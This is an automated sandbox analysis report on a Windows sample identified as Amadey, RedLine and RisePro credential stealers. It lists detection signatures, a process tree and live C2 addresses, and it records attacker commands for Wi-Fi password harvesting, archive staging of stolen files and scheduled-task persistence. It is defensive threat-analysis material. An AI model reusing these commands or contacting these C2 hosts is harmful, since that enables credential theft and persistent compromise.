Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
Analysis ID: 1428500
MD5: f854143c49c4d2fa4cf73bab97ba8d3a
SHA1: 62454e89cf9b2558347e2179f49fb4a56f4762ec
SHA256: 8c8afd00e6087780e4ee0a36f170ba06f13ba6d0c46cd2119b876e88d40c24e3
Tags: Amadey, exe

Detection

Amadey, RedLine, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey's Clipper DLL
Yara detected Amadey's stealer DLL
Yara detected RedLine Stealer
Yara detected RisePro Stealer
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Suspicious Add Scheduled Task Parent
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe (PID: 6128 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe" MD5: F854143C49C4D2FA4CF73BAB97BA8D3A)
    • explorha.exe (PID: 1788 cmdline: "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" MD5: F854143C49C4D2FA4CF73BAB97BA8D3A)
  • explorha.exe (PID: 2428 cmdline: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe MD5: F854143C49C4D2FA4CF73BAB97BA8D3A)
  • explorha.exe (PID: 4484 cmdline: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe MD5: F854143C49C4D2FA4CF73BAB97BA8D3A)
    • rundll32.exe (PID: 5168 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 3356 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 5228 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3176 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 1164 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
    • amert.exe (PID: 1988 cmdline: "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe" MD5: 339020815B65530333BF2DDC928AC867)
    • 831840b410.exe (PID: 3364 cmdline: "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe" MD5: FB666C3917F960FD67DF0C2C8829D77F)
      • chrome.exe (PID: 412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 2956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 3092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 8152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • c884f8452a.exe (PID: 5596 cmdline: "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" MD5: 52257E8159B53FFB0F4E7CAE516DC107)
      • schtasks.exe (PID: 6420 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3636 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 8032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • explorha.exe (PID: 5732 cmdline: "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" MD5: F854143C49C4D2FA4CF73BAB97BA8D3A)
  • chrosha.exe (PID: 6044 cmdline: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe MD5: 339020815B65530333BF2DDC928AC867)
  • svchost.exe (PID: 5144 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • MPGPH131.exe (PID: 4012 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 52257E8159B53FFB0F4E7CAE516DC107)
    • WerFault.exe (PID: 7472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 2052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • MPGPH131.exe (PID: 3436 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 52257E8159B53FFB0F4E7CAE516DC107)
    • WerFault.exe (PID: 720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1948 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 831840b410.exe (PID: 5672 cmdline: "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe" MD5: FB666C3917F960FD67DF0C2C8829D77F)
    • chrome.exe (PID: 2764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1636,i,5624198576768077496,445941079671464976,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • c884f8452a.exe (PID: 7988 cmdline: "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" MD5: 52257E8159B53FFB0F4E7CAE516DC107)
  • RageMP131.exe (PID: 1864 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 52257E8159B53FFB0F4E7CAE516DC107)
  • 831840b410.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe" MD5: FB666C3917F960FD67DF0C2C8829D77F)
    • chrome.exe (PID: 8004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 2124 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1984,i,457568203381776828,11237095852378400144,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrosha.exe (PID: 8024 cmdline: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe MD5: 339020815B65530333BF2DDC928AC867)
    • build12.exe (PID: 5608 cmdline: "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe" MD5: 4CFD179519524269052023E10DE6B866)
      • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7996 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 3844 cmdline: MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 7396 cmdline: MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • build12.exe (PID: 7324 cmdline: MD5: 4CFD179519524269052023E10DE6B866)
      • conhost.exe (PID: 7292 cmdline: MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • c884f8452a.exe (PID: 7476 cmdline: "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" MD5: 52257E8159B53FFB0F4E7CAE516DC107)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["http://193.233.132.56/Pneh2sXQk0/index.php"]}
{"C2 url": ["b-stamps.gl.at.ply.gg:30946"], "Bot Id": "Traffic"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
dump.pcap | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x18138a5:$a4: get_ScannedWallets
  • 0x1812599:$a5: get_ScanTelegram
  • 0x1813529:$a6: get_ScanGeckoBrowsersPaths
  • 0x1810e4d:$a7: <Processes>k__BackingField
  • 0x180e629:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x181065d:$a9: <ScanFTP>k__BackingField

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
C:\Users\user\AppData\Local\Temp\1000187001\build12.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\1000187001\build12.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\1000187001\build12.exe | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x135ca:$a4: get_ScannedWallets
  • 0x12428:$a5: get_ScanTelegram
  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
  • 0x1106a:$a7: <Processes>k__BackingField
  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x1099e:$a9: <ScanFTP>k__BackingField

Source | Rule | Description | Author | Strings
0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security
00000000.00000003.2052123987.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security

Source | Rule | Description | Author | Strings
52.0.build12.exe.3c0000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
52.0.build12.exe.3c0000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
52.0.build12.exe.3c0000.0.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x135ca:$a4: get_ScannedWallets
  • 0x12428:$a5: get_ScanTelegram
  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
  • 0x1106a:$a7: <Processes>k__BackingField
  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x1099e:$a9: <ScanFTP>k__BackingField
52.0.build12.exe.3c0000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1048a:$u7: RunPE
  • 0x13b41:$u8: DownloadAndEx
  • 0x9130:$pat14: , CommandLine:
  • 0x13079:$v2_1: ListOfProcesses
  • 0x1068b:$v2_2: get_ScanVPN
  • 0x1072e:$v2_2: get_ScanFTP
  • 0x1141e:$v2_2: get_ScanDiscord
  • 0x1240c:$v2_2: get_ScanSteam
  • 0x12428:$v2_2: get_ScanTelegram
  • 0x124ce:$v2_2: get_ScanScreen
  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x13509:$v2_2: get_ScanBrowsers
  • 0x135ca:$v2_2: get_ScannedWallets
  • 0x135f0:$v2_2: get_ScanWallets
  • 0x13610:$v2_3: GetArguments
  • 0x11cd9:$v2_4: VerifyUpdate
  • 0x1660a:$v2_4: VerifyUpdate
  • 0x139ca:$v2_5: VerifyScanRequest
  • 0x130c6:$v2_6: GetUpdates
  • 0x165eb:$v2_6: GetUpdates
15.2.chrosha.exe.70000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

System Summary

Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, ProcessId: 4484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\831840b410.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 3356, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 3176, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, ProcessId: 4484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\831840b410.exe
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 3356, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 3176, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, CommandLine: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe, ParentProcessId: 5596, ParentProcessName: c884f8452a.exe, ProcessCommandLine: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, ProcessId: 6420, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 3356, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 3176, ProcessName: powershell.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5144, ProcessName: svchost.exe

Stealing of Sensitive Information

Source: Process started, Author: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 3356, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 5228, ProcessName: netsh.exe

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
04/19/24-03:29:11.518092 | 2044696 | 49719 | 80 | TCP | A Network Trojan was detected
04/19/24-03:29:07.505716 | 2855239 | 49717 | 80 | TCP | A Network Trojan was detected
04/19/24-03:30:04.436794 | 2856122 | 80 | 49869 | TCP | A Network Trojan was detected
04/19/24-03:29:25.875488 | 2044696 | 49768 | 80 | TCP | A Network Trojan was detected
04/19/24-03:29:36.618824 | 2046269 | 49774 | 58709 | TCP | A Network Trojan was detected
04/19/24-03:29:15.465561 | 2044696 | 49721 | 80 | TCP | A Network Trojan was detected
04/19/24-03:30:04.208351 | 2046266 | 58709 | 49870 | TCP | A Network Trojan was detected
04/19/24-03:29:21.206725 | 2044696 | 49741 | 80 | TCP | A Network Trojan was detected
04/19/24-03:29:31.281244 | 2046269 | 49762 | 58709 | TCP | A Network Trojan was detected
04/19/24-03:29:36.518747 | 2046269 | 49773 | 58709 | TCP | A Network Trojan was detected
04/19/24-03:30:06.348500 | 2044696 | 49880 | 80 | TCP | A Network Trojan was detected
04/19/24-03:30:07.998984 | 2044696 | 49886 | 80 | TCP | A Network Trojan was detected
04/19/24-03:29:23.961610 | 2049060 | 49762 | 58709 | TCP | A Network Trojan was detected
04/19/24-03:30:16.706571 | 2046266 | 58709 | 49918 | TCP | A Network Trojan was detected
04/19/24-03:29:08.315222 | 2856151 | 49718 | 80 | TCP | A Network Trojan was detected
04/19/24-03:29:47.530154 | 2046266 | 58709 | 49822 | TCP | A Network Trojan was detected
04/19/24-03:29:03.313673 | 2856147 | 49713 | 80 | TCP | A Network Trojan was detected
04/19/24-03:30:09.223113 | 2855239 | 49892 | 80 | TCP | A Network Trojan was detected
04/19/24-03:34:03.054930 | 2856147 | 50734 | 80 | TCP | A Network Trojan was detected
04/19/24-03:29:24.139646 | 2046266 | 58709 | 49762 | TCP | A Network Trojan was detected
04/19/24-03:30:08.961575 | 2856151 | 49890 | 80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:24.405929
                              SID:2046267
                              Source Port:58709
                              Destination Port:49762
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:03.820669
                              SID:2856122
                              Source Port:80
                              Destination Port:49713
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:30.283553
                              SID:2046267
                              Source Port:58709
                              Destination Port:49773
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:40.962203
                              SID:2046266
                              Source Port:58709
                              Destination Port:49809
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:30.339002
                              SID:2046267
                              Source Port:58709
                              Destination Port:49774
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:30.018405
                              SID:2046266
                              Source Port:58709
                              Destination Port:49773
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:30.089886
                              SID:2046266
                              Source Port:58709
                              Destination Port:49774
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              AV Detection

                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, Avira: detected
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Avira: detection malicious, Label: HEUR/AGEN.1305500
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, Avira: detection malicious, Label: HEUR/AGEN.1305500
